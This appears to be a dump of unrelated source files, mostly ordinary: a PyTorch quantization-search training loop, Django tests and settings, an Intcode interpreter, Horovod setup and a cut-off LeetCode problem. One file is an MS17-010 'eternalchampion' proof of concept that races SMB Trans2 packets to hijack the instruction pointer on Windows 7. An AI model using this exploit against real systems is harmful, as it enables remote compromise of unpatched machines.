train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=validation_transforms)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False, num_workers=args.workers,pin_memory=True)
elif args.dataname == 'cub':
transform_cub = transforms.Compose([
transforms.Resize((224, 224)),
transforms.RandomCrop(224, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
train_data = datasets.ImageFolder(root=traindir, transform=transform_cub)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=transform_cub)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname =='cars':
train_tfm=transforms.Compose([
transforms.Scale(250),
transforms.RandomSizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4706145, 0.46000465, 0.45479808), (0.26668432, 0.26578658, 0.2706199))
])
val_tfm=transforms.Compose([
transforms.Scale(224),
transforms.RandomSizedCrop(224),
transforms.ToTensor(),
transforms.Normalize((0.46905602, 0.45872932, 0.4539325), (0.26603131, 0.26460057, 0.26935185))
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
train_data = datasets.ImageFolder(root=traindir, transform=train_tfm)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=val_tfm)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname == 'aircraft':
resize = 500
transform_train = transforms.Compose([
transforms.Resize(int(resize / 0.875)),
transforms.RandomCrop(resize),
transforms.RandomHorizontalFlip(0.5),
# transforms.ColorJitter(brightness=0.126, saturation=0.5),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
transform_test = transforms.Compose([
transforms.Resize(int(resize / 0.875)),
transforms.CenterCrop(resize),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
train_dataset = Aircraft(args.data, train=True, download=False,
transform=transform_train)
test_dataset = Aircraft(args.data, train=False, download=False,
transform=transform_test)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers,
pin_memory=True)
val_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers,
pin_memory=True)
elif args.dataname == 'food' or args.dataname == 'pets':
train_tfms = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
valid_tfms = transforms.Compose([
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(root=traindir, transform=train_tfms)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=valid_tfms)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
else:
raise NotImplementedError
if args.evaluate:
# validate(val_loader, full_model, criterion, args)
validate(val_loader, model, criterion, args)
return
print('========= initial architecture =========')
print('start time:',time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
# validate(val_loader, full_model, criterion, args)
if hasattr(model, 'module'):
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.module.fetch_best_arch()
else:
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.fetch_best_arch()
print('best model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
bitops, bita, bitw))
print('expected model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
mixbitops, mixbita, mixbitw))
for key, value in best_arch.items():
print('{}: {}'.format(key, value))
best_epoch = args.start_epoch
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, arch_optimizer, epoch, args)
# train for one epoch
train(train_loader, model,full_model, criterion, optimizer, arch_optimizer, epoch, args)
print('========= architecture =========')
if hasattr(model, 'module'):
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.module.fetch_best_arch()
else:
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.fetch_best_arch()
print('best model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
bitops, bita, bitw))
print('expected model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
mixbitops, mixbita, mixbitw))
for key, value in best_arch.items():
print('{}: {}'.format(key, value))
# evaluate on va lidation set
acc1 = validate(val_loader, model, criterion, args)
# remember best acc@1 and save checkpoint
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
if is_best:
best_epoch = epoch
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
'arch_optimizer': arch_optimizer.state_dict(),
}, is_best, epoch, args.step_epoch,filename=args.expname)
print('used time:', time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
print('Best Acc@1 {0} @ epoch {1}'.format(best_acc1, best_epoch))
print('end time:', time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
def cal_l2loss( x, y):
return (F.normalize(x.view(x.size(0), -1)) - F.normalize(y.view(y.size(0), -1))).pow(2).mean()
def train(train_loader, model,full_model, criterion, optimizer, arch_optimizer, epoch, args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
aux_losses = AverageMeter('Aux Loss',':.4e')
complex_losses = AverageMeter('Complex Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
curr_lr = optimizer.param_groups[0]['lr']
curr_lra = arch_optimizer.param_groups[0]['lr']
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, aux_losses,complex_losses,top1, top5],
prefix="Epoch: [{}/{}]\t"
"LR: {}\t"
"LRA: {}\t".format(epoch, args.epochs, curr_lr, curr_lra))
# switch to train mode
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
aux_loss=0
output,attr_quant = model(images,mode='swa',TS='Quant')
output_full,attr_full = full_model(images,mode='swa',TS='Full')
if args.pnorm>0:
pnorm=args.pnorm
else:
if hasattr(model, 'module'):
mix_bops = model.module.fetch_bit()
else:
mix_bops = model.fetch_bit()
pnorm=args.product*mix_bops
loss = criterion(output, target)
for l in range(len(attr_full)):
attr_full[l] = torch.pow(attr_full[l], pnorm)
aux_loss += cal_l2loss(attr_full[l], attr_quant[l])
loss=args.aux_weight*aux_loss+loss
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
aux_losses.update(args.aux_weight*aux_loss.item(),images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# complexity penalty
if args.complexity_decay != 0:
if hasattr(model, 'module'):
loss_complexity = args.complexity_decay * model.module.complexity_loss()
else:
loss_complexity = args.complexity_decay * model.complexity_loss()
complex_losses.update(loss_complexity.item(),images.size(0))
loss += loss_complexity
# compute gradient and do SGD step
optimizer.zero_grad()
arch_optimizer.zero_grad()
loss.backward()
optimizer.step()
arch_optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
def validate(val_loader, model, criterion, args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(val_loader),
[batch_time, losses, top1, top5],
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images,mode='eval')
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, epoch, step_epoch, filename):
if not os.path.isdir(filename):
os.makedirs(filename)
torch.save(state, os.path.join(filename,'arch_checkpoint.pth.tar'))
if is_best:
shutil.copyfile(os.path.join(filename,'arch_checkpoint.pth.tar'), os.path.join(filename,'arch_model_best.pth.tar'))
if (epoch + 1) % step_epoch == 0:
shutil.copyfile(os.path.join(filename,'arch_checkpoint.pth.tar'),os.path.join(filename, 'arch_checkpoint_ep{}.pth.tar'.format(epoch + 1)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def adjust_learning_rate(optimizer, arch_optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every step_epochs"""
lr = args.lr * (0.1 ** (epoch // args.step_epoch))
lra = args.lra * (0.1 ** (epoch // args.step_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
for param_group in arch_optimizer.param_groups:
param_group['lr'] = lra
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
| 42.898187
| 146
| 0.602412
|
cbcdf4bf565b42edf1e04e35d5ff79c0fbe5b561
| 247
|
py
|
Python
|
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
numbers = input().split(",")
zero_list = []
others_list = []
for el in numbers:
element = int(el)
if element == 0:
zero_list.append(element)
else:
others_list.append(element)
others_list += zero_list
print(others_list)
| 20.583333
| 35
| 0.643725
|
fea178a596f5dc1852b2a8f6574b1a05115a0ce9
| 6,769
|
py
|
Python
|
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from institution.models import Institution
from users.models import CustomUser
from users.models import Profile
from users.views import RegisterView, CompleteRegistrationView
class UserViewTests(TestCase):
fixtures = [
'institution/fixtures/tests/institutions.json',
'users/fixtures/tests/users.json',
]
def setUp(self):
self.institution = Institution.objects.get(name='Example University')
self.shibboleth_user = CustomUser.objects.get(email='shibboleth.user@example.ac.uk')
self.guest_user = CustomUser.objects.get(email='guest.user@external.ac.uk')
self.preregistered_user = CustomUser.objects.get(email='preregistered.user@example.ac.uk')
class RegisterViewTests(UserViewTests, TestCase):
def test_register_user(self):
"""
Ensure the register view is accessible for an authenticated shibboleth user.
"""
email = '@'.join(['authorised-user', self.institution.base_domain])
self.assertFalse(CustomUser.objects.filter(email=email).exists())
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
data = {
'first_name': 'John',
'last_name': 'Smith',
'reason_for_account': 'HPC',
'accepted_terms_and_conditions': True,
}
response = self.client.post(
reverse('register'),
data,
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('login'))
self.assertTrue(CustomUser.objects.filter(email=email).exists())
user = CustomUser.objects.get(email=email)
self.assertEqual(user.profile.account_status, Profile.AWAITING_APPROVAL)
self.assertTrue(user.has_perm('project.add_project'))
def test_register_view_as_unregistered_application_user(self):
"""
Ensure the register view is accessible to an unregistered
application user.
"""
email = '@'.join(['unregistered.user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 200)
self.assertTrue(isinstance(response.context_data['view'], RegisterView))
def test_register_view_as_preregistered_application_user(self):
"""
Ensure a preregistered application user is redirected to the
complete registration form.
"""
headers = {
'Shib-Identity-Provider': self.shibboleth_user.profile.institution.identity_provider,
'REMOTE_USER': self.preregistered_user.email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('complete-registration'))
def test_register_view_as_authorised_application_user(self):
"""
Ensure an authorised application user is redirected to the dashboard.
"""
headers = {
'Shib-Identity-Provider': self.shibboleth_user.profile.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('home'))
class CompleteRegistrationViewTests(UserViewTests, TestCase):
def test_complete_registration_view_as_preregistered_application_user(self):
"""
Ensure the complete registration view is accessible to a
preregistered application user.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.preregistered_user.email,
}
response = self.client.get(
reverse('complete-registration'),
**headers,
)
self.assertEqual(response.status_code, 200)
self.assertTrue(isinstance(response.context_data['view'],
CompleteRegistrationView))
class LoginViewTests(UserViewTests, TestCase):
def test_login_view_as_an_unauthorised_user(self):
"""
Ensure an unauthorised user is redirected to the register view.
"""
email = '@'.join(['unauthorised-user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('login'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response.url, reverse('register'))
def test_login_view_as_an_authorised_user(self):
"""
Ensure an authorised user is redirected to the dashboard.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email
}
response = self.client.get(
reverse('login'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('home'))
class LogoutViewTests(UserViewTests, TestCase):
def test_logout_view_as_an_unauthorised_user(self):
"""
Ensure an unauthorised user is redirected to the register view.
"""
email = '@'.join(['unauthorised-user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('logout'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('register'))
def test_logout_view_as_an_authorised_user(self):
"""
Ensure an authorised user is redirected to the logout view.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email,
}
response = self.client.get(
reverse('logout'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('logged_out'))
| 35.814815
| 98
| 0.629487
|
4854572f8c890b136885150d7fe104d9ce061bbb
| 3,713
|
py
|
Python
|
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
"""
Intcode CPU interpreter
"""
from queue import Queue
class IntcodeCpu:
def __init__(self, program):
self.ip = 0
self.memory = program
self.save_stack = []
self.input_queue = Queue()
self.output_queue = Queue()
p_count = {
1: 3, 2: 3, 7: 3, 8: 3,
5: 2, 6: 2,
3: 1, 4: 1,
99: 0
}
def run(self):
while True:
opcode, params = self.fetch()
if opcode == 99:
break
prev_ip = self.ip
self.execute(opcode, params)
if self.ip == prev_ip:
self.ip += (1 + len(params))
def fetch(self):
opcode = self.memory[self.ip]
parameter_mode, opcode = divmod(opcode, 100)
# 123 -> [3, 2, 1]; 45 -> [5, 4, 0] etc.
pmode = [int(x) for x in reversed(f'{parameter_mode:03d}')]
params = []
for idx in range(self.p_count[opcode]):
params.append(self.memory[self.ip + idx + 1])
return opcode, tuple(zip(pmode, params))
def execute(self, op, params):
# print(self.ip, op, params)
if op == 1: # add
src1, src2, dest = params
self.store(dest, self.load(src1) + self.load(src2))
elif op == 2: # multiply
src1, src2, dest = params
self.store(dest, self.load(src1) * self.load(src2))
elif op == 3: # input
dest = params[0]
value = self.get_input()
self.store(dest, value)
elif op == 4: # output
dest = params[0]
value = self.load(dest)
self.output(value)
elif op == 5: # jump-if-true
src, jmp = params
value = self.load(src)
if value != 0:
self.ip = self.load(jmp)
elif op == 6: # jump-if-false
src, jmp = params
value = self.load(src)
if value == 0:
self.ip = self.load(jmp)
elif op == 7: # less-than
src1, src2, dest = params
if self.load(src1) < self.load(src2):
self.store(dest, 1)
else:
self.store(dest, 0)
elif op == 8: # equals
src1, src2, dest = params
if self.load(src1) == self.load(src2):
self.store(dest, 1)
else:
self.store(dest, 0)
elif op == 99:
pass
else:
raise ValueError(f'unhandled opcode {op}')
def load(self, param):
pmode, param = param
if pmode == 1:
return param
elif pmode == 0:
return self[param]
else:
raise ValueError(f"Invalid parameter mode {pmode}")
def store(self, param, value):
pmode, param = param
if pmode == 1:
raise ValueError("Cannot store to immediate parameter")
elif pmode == 0:
self[param] = value
else:
raise ValueError(f"Invalid parameter mode {pmode}")
def __str__(self):
return ','.join(str(m) for m in self.memory)
def __getitem__(self, idx):
return self.memory[idx]
def __setitem__(self, idx, val):
try:
self.memory[idx] = val
except IndexError:
print(f"Bus error writing {val} to {idx}")
raise
def push_state(self):
self.save_stack.append((self.ip, self.memory.copy()))
def pop_state(self):
self.ip, self.memory = self.save_stack.pop()
def get_input(self):
return self.input_queue.get()
def output(self, value):
print(value)
self.output_queue.put(value)
| 28.343511
| 67
| 0.496095
|
32494830dc6d015a3c11faa7b3ac4b00e13961f4
| 2,591
|
py
|
Python
|
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
from impacket import smb
from mysmb import MYSMB
from struct import pack
import sys
'''
PoC: demonstrates how NSA eternalchampion controls RIP
Note:
- this PoC is tested against only Windows 7 x64 with 2 and 4 logical processors
'''
USERNAME = ''
PASSWORD = ''
if len(sys.argv) != 2:
print("{} <ip>".format(sys.argv[0]))
sys.exit(1)
target = sys.argv[1]
conn = MYSMB(target)
conn.login(USERNAME, PASSWORD)
# if share name is disk, the race is easier to win because there are more operation to do after InData is modified
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
conn.set_default_tid(tid)
def nsa_race(conn, jmp_addr):
setup = pack('<H', 5) # QUERY_PATH_INFO
# set info level to SMB_INFO_QUERY_EA_SIZE at request to force SrvSmbQueryPathInformation restart in another thread
param = pack('<HI', 2, 0) + '\x00'*4 # infoLevel, reserved, filename
mid = conn.next_mid()
# we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes
req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
# change infoLevel parameter to SMB_INFO_IS_NAME_VALID
req2 = conn.create_trans2_secondary_packet(mid, param=pack('<H', 6))
req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)
conn.send_raw(req1+req2+req3*8)
recvPkt = conn.recvSMB()
status = recvPkt.getNTStatus()
if status == 0xc0000022: # ACCESS_DENIED
# fail to modify infoLevel parameter to SMB_INFO_IS_NAME_VALID
#print('the race is completely fail')
sys.stdout.write('.')
elif status == 0xc0000010: # INVALID_DEVICE_REQUEST
#print('there is a race')
sys.stdout.write('*')
else:
sys.stdout.write('?')
sys.stdout.flush()
def my_race(conn, jmp_addr):
setup = pack('<H', 5) # QUERY_PATH_INFO
param = pack('<HI', 6, 0) + '\x00'*4 # infoLevel, reserved, filename
# directly race
for i in range(8):
mid = conn.next_mid()
req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)
conn.send_raw(req1+req3*11)
for i in range(8):
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() != 0xc0000010:
#print('return status: 0x{:x}'.format(recvPkt.getNTStatus()))
sys.stdout.write('*')
else:
sys.stdout.write('.')
sys.stdout.flush()
while True:
# if win a race, saved RIP will be modified to 0x4141414141414141
nsa_race(conn, 0x4141414141414141)
#my_race(conn, 0x4141414141414141)
conn.disconnect_tree(tid)
conn.logoff()
conn.get_socket().close()
| 30.127907
| 116
| 0.719027
|
73372b2bc7e3e1f4e1a7ab8597aeeb47b414fde2
| 2,622
|
py
|
Python
|
settings/dev.py
|
forevergao/loonflow
|
c21f6a7fa01ec6a4be1dcfc08c3ca40c6c3e42bd
|
[
"MIT"
] | 1
|
2019-04-24T12:39:07.000Z
|
2019-04-24T12:39:07.000Z
|
settings/dev.py
|
awsay/loonflow
|
d745f64bfa3d7892fb47e62ed7cec172ddac7c28
|
[
"MIT"
] | 1
|
2019-04-02T06:32:03.000Z
|
2019-04-02T06:32:03.000Z
|
settings/dev.py
|
awsay/loonflow
|
d745f64bfa3d7892fb47e62ed7cec172ddac7c28
|
[
"MIT"
] | null | null | null |
from settings.common import *
MIDDLEWARE = [
'service.csrf_service.DisableCSRF',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'service.permission.api_permission.ApiPermissionCheck',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'loonflownew', # Or path to database file if using sqlite3.
'USER': 'loonflownew', # Not used with sqlite3.
'PASSWORD': '123456', # Not used with sqlite3.
'HOST': '127.0.0.1', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
}
}
REDIS_HOST = '127.0.0.1'
REDIS_PORT = 6379
REDIS_DB = 0
REDIS_PASSWORD = ''
CELERY_BROKER_URL = 'redis://127.0.0.1:6379/1'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'standard': {
'format': '%(asctime)s %(pathname)s process-%(process)d thread-%(thread)d %(lineno)d [%(levelname)s]: %(message)s',
},
},
'handlers': {
'file_handler': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.environ['HOME'] + '/loonflow.log',
'formatter': 'standard'
},
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'django': {
'handlers': ['file_handler'],
'propagate': True,
'level': 'INFO',
},
'django.db.backends': {
'handlers': ['console'],
'propagate': True,
'level': 'INFO',
}
}
}
| 33.615385
| 131
| 0.539283
|
31722da3c39424845250f7d9b1e98eadce8bb293
| 1,539
|
py
|
Python
|
athena/horovod_main.py
|
Huang17/athena
|
9077f57f5b7aa64a28487d8b30f1781783d45a42
|
[
"Apache-2.0"
] | 1
|
2020-08-26T08:56:49.000Z
|
2020-08-26T08:56:49.000Z
|
athena/horovod_main.py
|
shuaijiang/athena-2
|
5d4d6d13075b8ee9fd824ce6258cb8f55dd157eb
|
[
"Apache-2.0"
] | null | null | null |
athena/horovod_main.py
|
shuaijiang/athena-2
|
5d4d6d13075b8ee9fd824ce6258cb8f55dd157eb
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Only support tensorflow 2.0
# pylint: disable=invalid-name, no-member
r""" entry point for multi-gpu/ multi-machine training """
import sys
import json
import tensorflow as tf
import horovod.tensorflow as hvd
from absl import logging
from athena import HorovodSolver
from athena.main import parse_config, train
if __name__ == "__main__":
logging.set_verbosity(logging.INFO)
if len(sys.argv) < 2:
logging.warning('Usage: python {} config_json_file'.format(sys.argv[0]))
sys.exit()
tf.random.set_seed(1)
json_file = sys.argv[1]
#config = None
#with open(json_file) as f:
# config = json.load(f)
#p = parse_config(config)
HorovodSolver.initialize_devices()
#multi-servers training should use hvd.rank()
train(json_file, HorovodSolver, hvd.size(), hvd.rank())
| 34.2
| 80
| 0.689409
|
34caa512e3f6fcf93e9b677a158e8ca520ed9ac2
| 4,876
|
py
|
Python
|
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | 18
|
2019-08-01T07:45:02.000Z
|
2022-03-31T18:05:44.000Z
|
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | 15
|
2019-12-29T08:46:20.000Z
|
2022-03-08T14:14:05.000Z
|
"""
LeetCode 655. Print Binary Tree
Print a binary tree in an m*n 2D string array following these rules:
The row number m should be equal to the height of the given binary tree.
The column number n should always be an odd number.
The root node's value (in string format) should be put in the exactly middle of the first row it can be put. The column and the row where the root node belongs will separate the rest space into two parts (left-bottom part and right-bottom part). You should print the left subtree in the left-bottom part and print the right subtree in the right-bottom part. The left-bottom part and the right-bottom part should have the same size. Even if one subtree is none while the other is not, you don't need to print anything for the none subtree but still need to leave the space as large as that for the other subtree. However, if two subtrees are none, then you don't need to leave space for both of them.
Each unused space should contain an empty string "".
Print the subtrees following the same rules.
Example 1:
Input:
1
/
2
Output:
[["", "1", ""],
["2", "", ""]]
Example 2:
Input:
1
/ \
2 3
\
4
Output:
[["", "", "", "1", "", "", ""],
["", "2", "", "", "", "3", ""],
["", "", "4", "", "", "", ""]]
